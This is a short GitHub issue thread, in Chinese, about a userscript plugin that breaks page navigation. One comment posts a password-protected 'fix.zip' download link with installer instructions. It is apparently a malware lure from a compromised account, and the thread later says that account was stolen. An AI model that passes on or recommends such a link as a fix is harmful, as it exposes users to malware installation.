### ISSUE TITLE
开启插件后，跳转页面无法正常响应

### ISSUE THREAD

**Issue by dlzmoe** [dlzmoe/linuxdo-scripts#11]
详情

https://linux.do/t/topic/187251/37

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dlzmoe** [comment]
@cnhbliyou ？

**Comment by riyuu2197** [comment]
> @cnhbliyou ？

对不起，号突然被盗了，现在我已经注销了这个账号
